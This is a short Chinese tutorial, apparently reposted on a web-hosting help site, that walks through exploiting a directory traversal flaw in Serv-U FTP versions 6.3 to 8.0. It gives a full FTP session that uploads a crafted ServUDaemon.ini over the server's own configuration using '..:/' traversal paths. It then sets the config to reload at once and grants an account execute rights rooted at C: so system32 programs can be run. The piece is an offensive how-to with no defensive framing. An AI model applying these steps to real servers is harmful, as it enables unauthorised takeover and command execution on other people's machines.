1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。
使用可写帐号登录(如果是匿名ftp,则只有读取权限)
C:\Documents and Settings\Administrator>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (127.0.0.1:(none)): admin
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd /
250 Directory changed to /
ftp> lcd c:\
Local directory now C:\.
ftp> put ServUDaemon.ini "..:/..:/..:/..:/Program Files/RhinoSoft.com/Serv-U/Ser
vUDaemon.ini"
200 PORT Command successful.
150 Opening ASCII mode data connection for ServUDaemon.ini.
226 Transfer complete.
ftp: 585 bytes sent in 0.00Seconds 585000.00Kbytes/sec.
注意:每次尽量通过cd / www.xxx.com 切换到当前跟目录,以便使用..:/..:/相对的时候不会出错。
2.对于重新配置servudaemon.ini后,立即生效问题,
可以在配置文件里面加入:
[GLOBAL]
Version=6.3.0.0
ReloadSettings=True
3.对于执行权限:
给予帐号RWAMELCDP权限,其中e是执行,p是继承,一般根目录为c:,以便可以对system32下面的exe直接调用。
作者 hi.baidu.com/it_security
渝公网安备 50024202000196号
域名注册知识
虚拟主机知识
网站建设知识
网络推广知识
网络营销知识
常见技术问题
QQ空间
新浪微博
开心网
人人网